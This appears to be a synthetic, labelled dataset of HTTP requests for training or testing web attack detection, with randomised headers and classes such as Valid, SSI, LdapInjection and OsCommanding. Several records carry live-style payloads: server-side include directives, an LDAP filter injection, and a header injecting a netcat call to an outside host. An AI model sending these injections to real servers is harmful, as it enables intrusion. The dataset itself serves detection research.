Authorization: NTLM aXNhbnNuYXNyZGhWb29jY3R0ZGF5MkFuYW1yZ2l0aXZlZG10WThxZWFzdUlud2s=
Range: 26855-,847-,-23
Referer: http://www.nacperA.org/7hih/ffeo/f5UN/Lra2oe.swf
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.3 (Windows; U; Win 9x 0.5; oo-tu; rv:4.4.3) Gecko/71145468
UA-CPU: StrongARM
UA-Disp: 384,417,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 402x308
Via: qtoee/4.8 40.198.69.141, 3.6 164.143.55.107, 4.6 www.2Tdhd.shtml
Transfer-Encoding: compress
Upgrade: ca5umo/2.1, neaa/3.0
Warning: 964 www.iae6.js "rnaaenmimaot" 
X-Forwarded-For: 152.153.32.113
X-Serial-Number: 9495993319607061113
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sH9e4hde9ln=ucwwJb&ebhita=ddrelRni&2qRa=da3lssti&dM2nrz4sae0ca2t=8g-hrnAoexecaoo&dcuo8f=14193946&mseanr=l'>wtom9n&eteooqr=kainei&khtaccesqeElVzw5ag=trdyhu

End - Id: 33788
Start - Id: 19450
class: Valid
GET /ihoO8Op/athnotviaAc/W..js?wiztdcl=ee2&ji=lnr6nejt4ZiPesussy&oye4P=6820691&amelmeeteob0=%3CRus3&ebutn=al&tuOooc7ll5eedo=lif&bI4tnwirtltm=SeihteeeAsohszo&egamRvteiwosas5=27132&m5Dtc9=+en8e5orOtxQDaroto&beoce=-aodO&UgOLxlCuJs=3778 HTTP/1.1
Host: 84.220.41.58
Connection: ddttd
Accept: image/*, video/*, text/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: ecEc9n-lrot;q=0.8
Cache-Control: no-store
Client-ip: 168.104.135.23
Cookie: sajodhcrrfsy=8hvhe7l
Cookie2: $Version="7"
Date: Thu, 02 Jun 05 03:54:57 GMT
ETag: "5BfOpPQ5XipIkJT3Uyy"
Expect: vel6ever=0n3x0
From: 6eot@yipWaeAxA.cz
If-Modified-Since: Sun, 13 May 07 09:15:38 GMT
If-Unmodified-Since: Fri, 02 Jun 06 20:04:30 UTC
If-Match: "qCyiWgonl-1jnBuS4gt"
If-None-Match: "3JuEWfrQRm8kNiA54"
If-Range: "jtjFQAM1y@MCKzvbtld"
Max-Forwards: 3482
MIME-Version: 8.7
Pragma: dqara=oIDhote
Proxy-Authorization: 3sbeS dvsesc=eiTj2
Authorization: Digest opaque="roeoyii"
Range: -5,725866-,-2
Referer: /neledit.gif
TE: deflate,trailers,gzip;q=0.8
Trailer: Accept
User-Agent: lhdaunyhSnynhnfg
UA-CPU: x86
UA-Disp: 915,682,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6480x436
Via: HTTP/6.6 16.194.26.138, 2.9 www.sCur.css, nrua/7.9 www.p7emse.jpeg
Transfer-Encoding: deflate
Upgrade: lpy/0.1, cic/4.4
Warning: 889 www.tpb2d.html "1p2mfhiat" 
X-Forwarded-For: 83.131.31.88
X-Serial-Number: 219251362727568
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19450
Start - Id: 31875
class: Valid
GET /3eR/7RLaQb4xnS2/T5dySb1ret3yod3tn6y/mBxY/c0adminxYrmunionU3L/wdbtooh5/nsrM.i0fC.4/imde1mzsoStensn/eDRDVWrNZkklSzU5Yih/eeese/-replacesO_HjMOqwindow.open.png?arum=31&iuu=9555237 HTTP/1.0
Host: www.meapeenp41.be:3
Connection: close
Accept: image/*;q=0.8, audio/*
Accept-Charset: *;q=0.2
Accept-Encoding: compress;q=0.1
Accept-Language: oedSi-9uap1yrc;q=0.7, t-ts;q=0.3, gd-meaei;q=0.8, aeLi-jMe8l
Cache-Control: no-store
Client-ip: 81.184.202.90
Cookie: nwnhagtjrt0=eptowt;r5c8uet4iad=domftpdivxmleuc6eht;lateTdgtLdie=gLG5NqSKA3-;iIsg=qr|hi2rwegzliaab@
Cookie2: $Version="07"
Date: Sat, 01 Dec 07 08:38:17 GMT
ETag: W/"50bvl8Lx1OUGW-so"
Expect: ina7g=6nmyvn
From: 4grn@di4boa.net
If-Modified-Since: Tue, 06 Oct 09 12:53:23 GMT
If-Unmodified-Since: Tue, 13 Oct 09 18:44:44 CET
If-Match: "L1kfVmAq2RLn_azN8B"
If-None-Match: *
If-Range: Tue, 13 Oct 09 14:51:53 UTC
Max-Forwards: 411
MIME-Version: 9.1
Pragma: iisSc='tt5ee'
Proxy-Authorization: Digest uri=http://www.emawxiS.net/IosLy.bin
Authorization: Digest opaque="cjfh"
Range: 44952-,546543-
Referer: http://yl0ckiza.net/e7l6d4i/setjm/txcjtiel/awPBp/ehua.php4
TE: chunked;q=0.1
Trailer: Date
User-Agent: asise (i92aVmNxPN; f9lKTMcv; rkaEW_0OF; ig@x5N; eBGkKxZwa)
UA-CPU: MIPS
UA-Disp: 280,3333,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 388x5365
Via: 0.6 112.237.247.102:32466, HTTP/5.7 www.srlss.htm:53934
Transfer-Encoding: lEjmee
Upgrade: eml/3.8, iieac/7.9, l8rl/0.1, eDm/0.3
Warning: 167 24.248.253.219 "whbgrnjdetnenb" "Sat, 13 May 06 20:49:02 GMT"
X-Forwarded-For: 32.149.24.132
X-Serial-Number: 69375200108238652611
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31875
Start - Id: 16063
class: Valid
GET /CvrAJ5-J3/hrRdkj7.html?@MM2olG=0cmaAmERrkaceT&pDYexec=ioFFCk-vw.8&nstaboaaUn=sQews%3B%3At0vgsgcoeir&hydknhecp=+eens&lcn3tOgehdrrrEe=htEae%7Ec&ifiix9ansi4heej=s.W1PV&Hih7boAiuellee=rhedd%5Cmsystemh0asstEvnid HTTP/1.1
Host: www.9c7saasbo.fr
Connection: close
Accept: image/*;q=0.2
Accept-Charset: ks_c_5601-1987, iso-8859-9, iso-8859-5
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 139.53.120.102
Cookie: diisTeNndCgo=ot9f \le;g2tezwtsa=rwiseaTli
Cookie2: $Version="7"
Date: Sat, 26 Mar 05 03:24:31 UTC
ETag: "rNPQqSBe3adujrY"
Expect: 100-continue
From: nsodrd@t9uule.biz
If-Modified-Since: Sun, 08 May 05 07:59:48 GMT
If-Unmodified-Since: Sat, 13 Sep 08 06:02:17 UTC
If-Match: *
If-None-Match: "bj9AHG6gYP3Whdu42PKi"
If-Range: *
Max-Forwards: 861
MIME-Version: 5.7
Pragma: af=veb5ele
Proxy-Authorization: Digest opaque="neh7g"
Authorization: NTLM bzF0bmNkNzlzaWltWUYweXVTZG8xNW9uaGVlZWVUdURhRGdoc1A=
Range: 63635-,-33
Referer: /alpnetai/etNghor/v8uedev1/drSeb9.tar
TE: trailers
Trailer: Via
User-Agent: Mozilla/7.2 (compatible; Konqueror/4.5; Open BSD i386; nena3Nt; ifaohre3)
UA-CPU: MIPS
UA-Disp: 489,939,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 973x791
Via: HTTP/7.6 www.hat1aax.htm, FTP/0.5 151.211.145.101:48
Transfer-Encoding: gzip
Upgrade: erd2c/3.3, ohn/2.9
Warning: 971 www.etow1.jpeg "oeancls" 
X-Forwarded-For: 199.28.224.223
X-Serial-Number: 552884692848315440
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16063
Start - Id: 21274
class: Valid
GET /i6_Yw8VuwrGu3vFpI/v4393XXdQZCM8piRj0/kswGNnhQrlHZ3/aa5SsOawe9EMrc2xirh/ioeoorelBeihmfwn/iuLjSEA9/3k59mNkl2ny0/WitO/heeUAwhexaezgRt.js?AB=winntOgae HTTP/1.0
Host: www.8Thejdl0.com
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 83.86.54.168
Cookie: Liy0=spssy9ensk0att;e1lnn=05
Cookie2: $Version="42"
Date: Thu, 19 Oct 06 01:55:33 UTC
ETag: "HPxL4jZpZyyUG8R9TSXv"
Expect: hOsusai=daoao;7tesylm=de1l
From: rodie@O0kE.st
If-Modified-Since: Fri, 11 Aug 06 02:46:32 UTC
If-Unmodified-Since: Mon, 19 Nov 07 21:23:36 UTC
If-Match: *
If-None-Match: "DUPnLazGC-NxEGv.m"
If-Range: Fri, 17 Aug 07 16:00:40 UTC
Max-Forwards: 121
MIME-Version: 6.6
Pragma: bieronhC='e'
Proxy-Authorization: rfoaR s8Soey=iediu
Authorization: NTLM dHB0dHVib21kZGc2dHJldGVoYmhpdXNtaTBlZVRoaW90bWF6YWljbg==
Range: 793-,8602-038713,9-
Referer: /aAat3uoz/eoil5se/4hya4/pgmzh3e/6ntfehne.cgi
TE: trailers
Trailer: TE
User-Agent: Mozilla/7.3 (X11; U; Solaris 0.8; sr-ed; rv:1.8.7) Gecko/06524835
UA-CPU: PowerPC
UA-Disp: 552,365,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 714x7693
Via: 1.1 www.natcv.shtml:316, 8.7 www.ahsuptsc.gif:7855, lh0ons/6.6 www.aateatt.png
Transfer-Encoding: gzip
Upgrade: aiaUud/7.9
Warning: 031 41.122.125.127:7076 "Eiaoenuons" 
X-Forwarded-For: 172.206.4.103
X-Serial-Number: 900444
----: ---------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 21274
Start - Id: 39224
class: SSI
GET /wCvnorkIo/vTXselectDDjmSjefET1/bqj7U/syaseiaunc0mimo/er3/8DTeoyc6ss/wrgZc6VCw6u4/nt49imwnlcie/hNnb4pqrF.uSdHqJyt/Xz.formrhl.nsf?h4rabvTn=oundahdrjogrfkEfB&vo5kiin=Iem%3A4&d2jh6ri=40244168&qiin0o3hOrc=sevae&eg0ana3i=%7Cunionsez&gPTCJDUIQ=5&Tennsioe=1sF&e2b=g8xt&FAhtaccesTcA-Q=0383&efihrRTna1nY=anby6ehjspo&tgeercnso8ht=l&emrr3d=8285&ootlshhdld9i=tsylog%27&gast=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.0
Host: 185.215.113.238
Connection: close
Accept: image/jpeg;q=0.1, application/postscript
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-transform
Client-ip: 189.12.146.191
Cookie: leerm=9652658;tcteesetsu=29
Cookie2: $Version="1"
Date: Sat, 30 Jun 07 01:19:22 UTC
ETag: "8w56.kx88HfXvMi9e"
Expect: 100-continue
From: eobt@sitnTmdv.ch
If-Modified-Since: Sat, 21 Nov 09 21:06:03 CET
If-Unmodified-Since: Sat, 01 Dec 07 03:49:50 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 19 May 07 21:16:14 CET
Max-Forwards: 671
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: tvfih toaier=t6einmm
Range: 5-9725,-6683
Referer: /h9i9aiv/m3pnCe/nrsc/fnxph/3zty.php
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/8.4 (Machintosh; U; Mac OS X 0.9; Ja-a6; rv:9.5.6) Gecko/95352596
UA-CPU: 68000
UA-Disp: 484,2296,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 506x400
Via: FTP/5.7 229.173.111.117, etnrdq/1.2 138.120.185.12, HTTP/7.8 159.121.75.92:725
Transfer-Encoding: 0heve
Upgrade: sjrtoN/2.4, ytwq/5.4, RmLke/9.3, citRri/1.2
Warning: 129 126.9.12.10:16 "imhtyn" "Mon, 07 Dec 09 08:44:31 GMT"
X-Forwarded-For: 252.9.253.184
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39224
Start - Id: 39169
class: SSI
GET /nrNbX0QzU0VRtosEdN/zPvnD2SQtkL8.js?sae=73860&eifwrP7am=fZ7m&eele=+cen0awEm&melSptnte7n4gta=2%24%28&Cxa=eaKKGWKYaQ&IphpMD6DV_=9743&sRrs9s=jafm+%240w+n&enoolnpiopoboi=0588373820&9xtii5jezxsreee=doh0ywprla HTTP/1.1
Host: www.oehTerelre.org
Connection: keep-alive
Accept-Encoding: identity;q=0.7, gzip
Accept-Language: *
Cookie: nSbgobmyer5uomL=ile7 m)Rt8;c.adminHmQDcmdkM=ainejbaloglvbscripteeD;nritm4Nf3ed=<!--#email fromhost="www.nwTsttdn.com" tohost="mailbox.tfEoe.com" message="asEa o7mqee e9A2pEsT 8oPaen" fromaddress="o5lt.com" toaddress="ujnn.ia.com" subject="gc" sender="2l.com" replyto="3essl.com" cc="tnL" inreplyto="oseGs yI3 7TN" id="msalmail" -->;eaq8upeoEsa=nYBNmh
Cookie2: $Version="1"
Date: Sat, 10 Dec 05 05:42:17 CET
If-Match: "vg3ng2PS5d@QtWY"
Max-Forwards: 781
Referer: /itcy/Fhomiwt/4neih4.bin
TE: deflate,trailers,trailers
User-Agent: Mozilla/1.4 (Windows; U; Windows NT 1.6; et-oa; rv:7.8.3) Gecko/20184822
----: -----------------------------------

null

End - Id: 39169
Start - Id: 38512
class: LdapInjection
GET /lA@ZnzPyc3.php3?l6ekrtiri4sN9=bgsound1Simg&uNea9hS=aeme%2Fr&rnqihdtnOh=eOktneitserShopp&wtgranqa=dFmtnNcd&Pttaisne=1442%29%28%26%28objectClass%3Dcaw%29%28%7C%28sn++%3D++++ea%29%28cn%3Dt0++++J*%29%29&ue4D7eM=89&8athreeE=hieiO HTTP/1.0
Host: 67.85.166.250
Connection: close
Accept: image/*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: ost8oies-eon
Cache-Control: no-transform
Client-ip: 83.3.20.105
Cookie: engl5sxa=cdnoOtelnetllswindow.openhu
Cookie2: $Version="388"
Date: Thu, 10 Jul 08 22:41:14 UTC
ETag: "qcoSX53foSbz95-5"
Expect: 100-continue
From: lscomkd@ophedlorn.cz
If-Modified-Since: Tue, 27 Jan 09 07:26:52 CET
If-Unmodified-Since: Wed, 19 Oct 05 06:36:08 GMT
If-Match: "cca5.6ISIkjdZr8kIR"
If-None-Match: "4pDd-_01lkxR3kHvu1"
If-Range: "qN9HSGace9QIzq7r08zz"
Max-Forwards: 087
MIME-Version: 3.3
Pragma: demoo='iebdo'
Proxy-Authorization: Digest response="Fd6C0B3D3bd244b0cA2F85cC8f1AA3cb"
Authorization: NTLM OWhYczduY291cmthT2hTa3JvM3NoZW5vZVlycmtkdU9lZ3JlYWVxbm52
Range: -087,245-62681,-648438
Referer: /ajGseo/d1lf/tw5oTlrl/lmta3/x9c2ine.php
TE: chunked,chunked
Trailer: Warning
User-Agent: qUuIlxwKS http://www.eosh.net
UA-CPU: 68000
UA-Disp: 299,3970,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 877x552
Via: HTTP/0.1 www.xuhe.jpg
Transfer-Encoding: wh4ba; 5hvata=d6Yrorfa
Upgrade: liDg/6.9, m3r2/7.5
Warning: 474 3.199.185.32 "psgyu2iuh9p6t" "Wed, 30 Jul 08 06:32:37 UTC"
X-Forwarded-For: 172.88.16.189
X-Serial-Number: 30599
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38512
Start - Id: 26902
class: Valid
GET /3varvxDUy6Rp/vH/idiesh6e/fnullwdQVXKPB2h_/r5O_50EUp5yWQ8dlE6R/nynD7xVRZb6@/qL2yo_YchVMp-Cn81_B.swf?G02aa=ysl%5Ci&ldh5lg=2nNxbeEsh&Bze-ykSEP=i5%3Bhalln%5Bebh&twteetlsSfte=iYQ&tdsazr3iLUmoeuo=++flstulsnseesnrceL&c5eeincyrc=463&iyu7lh3liHepcn=a%2Banh9%7C%29%40u3%25aPaoloK&rUihkEsiirj=d1epe84&N5jdeletexPobjectB=za%27e&on3heceed=zh2t&iasAmeotdst=039088&aevosqtGLtut2e=5754&ta3tm67dq=uiuueES&vssa5nPxzoti=%29pdautoexect7c%26+&wPlj007yvLgroup by0=tichtaccesleEe HTTP/1.0
Host: www.citsot.fr
Connection: keep-alive
Accept: image/*, audio/*, text/plain
Accept-Charset: iso-8859-2;q=0.2
Accept-Encoding: gzip;q=0.5, identity;q=0.6, identity;q=0.2, gzip
Accept-Language: *;q=0.0
Cache-Control: min-fresh=320
Client-ip: 187.70.10.21
Cookie: iSeiamezasti=enylodWlyim;lA9x0k=doexi&dhln;aso;hAthiSlloiLin=w\;3oizwcvaigg1=&gN
Cookie2: $Version="6"
Date: Thu, 02 Nov 06 23:48:33 GMT
ETag: "5_JedyMT5Ej0gYQ_"
Expect: etpe8ee
From: clW7Lgm@txs4tae.gov
If-Modified-Since: Sat, 20 May 06 21:25:27 GMT
If-Unmodified-Since: Thu, 21 Feb 08 23:25:53 GMT
If-Match: *
If-None-Match: "NEKCVimZr5.o264y2A"
If-Range: *
Max-Forwards: 7754
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Basic YmloYTppUnNz
Authorization: Basic bmFlb205OnNhdHRzbg==
Range: 0-,7-80207
Referer: http://www.omae.com/bslwunon/Honelreu/yebne2o/7uLvrmuO/ef3sc.doc
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: ettoyyla/8.8.2
UA-CPU: Sparc
UA-Disp: 0480,6767,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 0290x1154
Via: FTP/4.6 www.d0odStt.png
Transfer-Encoding: deflate
Upgrade: bsetmw/7.7
Warning: 785 139.199.253.164:9 "stduoo4mei" "Wed, 12 Dec 07 02:11:19 CET"
X-Forwarded-For: 202.36.161.97
X-Serial-Number: 7606285950640498
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26902
Start - Id: 24910
class: Valid
GET /nehjzpUd/h9ItyZUfOuwh./NH.png?edakej=ntl3ip3ueOtchrt&etNnrglnqevTd=%3D+ddn&Ktlopk5tRveAsm=8Mud0SM%40gy9&lhve=dmrdott41+8wa%2Fca&ey=l39%408&gnnouwqdysi=7758870&eEsegfoI4e=00470&xaooiu=+e&inn6m=663612&1s6ojnah=nitbi%3FtnGsn%7Cttt%3Dimgi2o&esh=15&HperltXNt9J7c=osnblpo1eaiav4are&B6HJ=81870803 HTTP/1.0
Host: 83.180.207.1
Connection: nttiIetn
Accept: text/html;q=0.0, audio/*;q=0.5, image/*;q=0.7
Accept-Charset: iso-8859-3, iso-8859-4, cp-950, ks_c_5601-1987, gb2312
Accept-Encoding: gzip;q=0.1, gzip;q=0.6
Accept-Language: e-la
Cache-Control: no-transform
Client-ip: 250.47.10.133
Cookie: ytegrowau2isumo=0;hLre=lpEF;IdeexecS=916;n9yunu7eu9S1l=3insertc;hadhi=eINo
Cookie2: $Version="9"
Date: Tue, 06 Jan 04 04:26:03 CET
ETag: W/"@PFwuy_CDfc9Wn35@u@N"
Expect: 0diAIo2=iagel
From: pwmfp9h@tptOa1oce.de
If-Modified-Since: Thu, 22 Mar 07 06:44:43 GMT
If-Unmodified-Since: Wed, 03 Feb 10 13:02:29 CET
If-Match: "YDXh0ILPGKqk59p"
If-None-Match: "Fb4otu9cWHZ6GKiHvk"
If-Range: "QbKqIIfCjPrsPzlwWmkO"
Max-Forwards: 57
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="nodeiar"
Authorization: Basic MmV3czVzdXM6dGZzY3BlYQ==
Range: -115
Referer: /phatn/tion/ehhrchxa/epTlopl/heoa.gif
TE: gzip,deflate
Trailer: If-Range
User-Agent: Mozilla/3.6 (X11; U; Linux i586 1.3; t9-ms; rv:7.4.8) Gecko/26185597
UA-CPU: MIPS
UA-Disp: 149,2049,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5160x7333
Via: 4.7 65.55.207.247
Transfer-Encoding: uu3tjn
Upgrade: sur/1.8, znripg/6.2, halyeo/7.1, osto/6.9
Warning: 183 238.92.156.51 "hdeD1us6xXiS0zlurs" "Sun, 02 Jan 05 14:53:03 GMT"
X-Forwarded-For: 45.246.59.205
X-Serial-Number: 5477334
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24910
Start - Id: 8491
class: Valid
GET /rIctstknkm/bEenueeeitdnHp.php?C4c9tt=lopdrop&nae=sonieede9DeaEmlfa&ehDZQBpositionOVi=auXv&jSAefheree=Malllibiohrv+a HTTP/1.1
Host: www.fo0lme.be:1237
Connection: hhEm
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-age=34232
Client-ip: 251.138.184.9
Cookie: eT=olet 0vdw;inpektdQeElltn=eoNmd8QIl;ri6qi8ej=67
Cookie2: $Version="314"
Date: Tue, 19 Jan 10 10:34:09 UTC
ETag: "x-0vskwvvt.CtBrpiL@m"
Expect: 100-continue
From: uifIa@nthr.st
If-Modified-Since: Sun, 14 Nov 04 11:47:56 CET
If-Unmodified-Since: Sun, 11 Jul 04 22:36:17 CET
If-Match: *
If-None-Match: "jr9xIrDD8yr6znkY5C"
If-Range: Sun, 18 May 08 16:32:20 CET
Max-Forwards: 4147
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic ZWRpdWVxaWE6Nmxvb2k=
Authorization: NTLM d2VwMExobGV5dGV1dGR0dGplYTduQ2hvZUh0aGpoMG9Yc2VhbnJUaGlsUg==
Range: -665,319484-,9-
Referer: /VaresNh/1bcs53g.msf
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/9.2 (X11; U; Open BSD i586 7.9; qk-oe; rv:8.8.0) Gecko/21221948
UA-CPU: 68000
UA-Disp: 8051,5811,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 6704x1260
Via: 6.5 www.reeU9.jpg, FTP/2.0 www.Tsbgbwe4.shtml, 4.2 148.144.154.27
Transfer-Encoding: 5eerhi
Upgrade: euen/7.1, tvtd1/2.8
Warning: 054 220.48.171.98 "iEbptnlss" "Sun, 08 Mar 09 01:03:10 CET"
X-Forwarded-For: 15.12.43.118
X-Serial-Number: 116122935
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8491
Start - Id: 42928
class: OsCommanding
GET /rpsietdTvemmt/fJ5hIjasoi5wyB@rs/hysE/9u/hk4OO_B2961i0pQ0O/ap_vzFcBJ/gB9xl8argdue6Kmu.2h/c0ettFRbidwhuTa/e7qq5Rxq6/lld@/d@.cfm?4nbi1t0eoxHd=eLgTtopeiehro&ee=peqaz HTTP/1.1
Host: www.yfbe.be
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: %0a   nc www.ntalsten.com  80  ;
Accept-Language: *;q=0.4
Cache-Control: max-stale=172
Client-ip: 251.173.122.211
Cookie: trevrdsaemto=it8sonentgeuol;cad=40001834;ySVr5Zra3=k496765lR9e;eys=u1EtZI9;bjsep=3XKd2tGq;0lt5=44764669
Cookie2: $Version="82"
Date: Fri, 17 Apr 09 10:46:37 CET
ETag: W/"dcw1nK4.kEPb-kAWR."
Expect: 100-continue
From: oIteteaa@odaSo1YA.it
If-Modified-Since: Mon, 27 Nov 06 07:11:53 UTC
If-Unmodified-Since: Tue, 24 Oct 06 17:10:48 CET
If-Match: *
If-None-Match: "0r1uavQUeEjHSDf80i5K"
If-Range: "vkwISyJp_eMW5fz5aE"
Max-Forwards: 155
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: iFeaha eoies=imeai6n
Authorization: NTLM NHRhY2p1ZzdyZ2pldTJpbXRncm9mc2RkaXNyc2VvYXJ3QWNoYWVhcg==
Range: 3-6521,8-,9454-87196
Referer: /yahahggo.bin
TE: trailers,trailers,deflate;q=0.5
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.5 (X11; U; Open BSD i586 9.1; at-nc; rv:9.2.6) Gecko/49001119
UA-CPU: PowerPC
UA-Disp: 3828,378,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 8266x6680
Via: so6j/7.7 www.dpyoss.html:6429, nssmdI/8.6 www.ike0tyWe.shtml, 8.7 www.faQirvrc.gif
Transfer-Encoding: identity
Upgrade: 9sh/5.0
Warning: 635 22.248.94.176 "ruzddvjemhiIjrwWr" 
X-Forwarded-For: 15.151.59.253
X-Serial-Number: 349968453574
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42928
Start - Id: 30889
class: Valid
GET /dr/hoe6JpawbGwiet3bi9/copengZf/3itieolxn/iqrrssiero.shtml?bydereRtlt=20HVMY060S2&hrrgreutteu=rt67T&pWCScQd30=bXFmY%40dnU&22iAonat8ara4a=9klosmnrapeul HTTP/1.1
Host: 102.220.33.247
Connection: thide
Accept: video/quicktime
Accept-Charset: x-mac-roman;q=0.0
Accept-Encoding: deflate;q=0.8
Accept-Language: *;q=0.6
Cache-Control: max-age=71
Client-ip: 17.214.18.38
Cookie: tetmhhaae=IkiJ%;erm1phfenoa4ir=5708283
Cookie2: $Version="2"
Date: Sat, 15 Apr 06 23:11:01 CET
ETag: W/"rQPx.FZ4dJp280hlby"
Expect: 100-continue
From: amHxrsrn@9as8ijaavb.it
If-Modified-Since: Thu, 10 Jan 08 09:19:35 GMT
If-Unmodified-Since: Fri, 05 Jan 07 10:40:46 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 10 Nov 07 05:45:05 UTC
Max-Forwards: 736
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: ihtSuR 1erotrKa=8edlbrl
Authorization: NTLM bm4yYWM3YTZ0b2xmbnNxMXl0ZHNrc251bjRmaGhlUmlwZTI=
Range: 4-
Referer: http://utnt.com/sl88/sneszpts.js
TE: gzip,chunked;q=0.9,chunked
Trailer: Host
User-Agent: uj5bHnsszpmgiopi
UA-CPU: MIPS
UA-Disp: 830,625,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 572x8066
Via: FTP/4.7 237.0.49.154, tpf/8.2 www.thcTT.gif
Transfer-Encoding: compress
Upgrade: spiie/8.9, apg2sc/2.7, exuI/4.7, ndd/9.7, fnvse/6.9
Warning: 189 www.mlol.css "aohnMtaeseT4szte" 
X-Forwarded-For: 207.136.105.149
X-Serial-Number: 0719551808086
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30889
Start - Id: 39364
class: SSI
GET /iziwM6As8cs6O6nWujDJ/qmt0hyyuontaqrb4wAt/oYhzRhPquLp04KzLm/pvmFdbk7GJnzg_yqn85/9tyh/ln9esy/skIbHJkcyv/treo/sNHpsjpw/a0AchwHdgt8weola0ce/lvhvoel/rhbu2gPSuS@Fzy9ho.html?Hp=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.1
Host: 70.247.252.111
Connection: close
Accept: audio/basic;q=0.5, text/xml;q=0.6
Accept-Charset: iso-8859-6;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=2890
Client-ip: 105.126.198.220
Cookie: NetcQ6vbscriptZa2ZwP=aCoGcbfGzMxj;jY24AT=34255;Btysle88Iidaif=fvn1t<t3x|o6exec+poe;Hgrofs=en6aHe9KdF;hrwean=qm2htp;fsqy3sn1esA=l>~
Cookie2: $Version="92"
Date: Fri, 09 Apr 10 24:09:29 CET
ETag: "otK3._w2Ir0715BPHo"
Expect: tiprS
From: ztifisTh@itMb.uk
If-Modified-Since: Fri, 30 Oct 09 15:16:07 CET
If-Unmodified-Since: Sat, 11 Apr 09 05:19:17 GMT
If-Match: *
If-None-Match: "l5hwTGXkh7vltlvqs"
If-Range: *
Max-Forwards: 0995
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: NTLM ZWFtb25kbXdsZm10ZWp0dG9Ub3NsZGlheHJhZWVoUDVyT3NtcDlwZWh0c2hIdHNl
Authorization: Digest nonce
Range: 3517-0,7-1
Referer: /iesfS/4ohD/oeb7rvy/TnrsN.html
TE: chunked,deflate,deflate
Trailer: Referer
User-Agent: Mozilla/7.5 (X11; U; SunOS sun4u 4.3; Yh-vt; rv:0.0.6) Gecko/35763776
UA-CPU: 68000
UA-Disp: 071,646,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3889x5923
Via: fse/7.8 www.cEstv.jpeg:3, qrdt/3.1 74.63.132.25
Transfer-Encoding: identity
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 323 73.178.52.116:03197 "ltotAehablocoeeRgen" "Sun, 08 Feb 09 14:43:34 UTC"
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 93635281760343064416
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39364
Start - Id: 21327
class: Valid
GET /deWThYpY5pVCqgA_kaD/ee45ren/fwl7cetn1yoZxol/xB-pQBFagP8oQkEZ/bEWHk6lkj/dPjPFY98@pJ4p/s8BZX0akD3blXZOH.swf?bmt=40021211 HTTP/1.0
Host: www.L1eiu.net
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-stale=3395
Client-ip: 107.104.243.184
Cookie: llqo4nksnmea=tAaeeua4a
Cookie2: $Version="158"
Date: Thu, 04 May 06 24:18:38 CET
ETag: W/"_JgP_hIeE0JkXWG"
Expect: 100-continue
From: rd1eArm@0dui5ee.biz
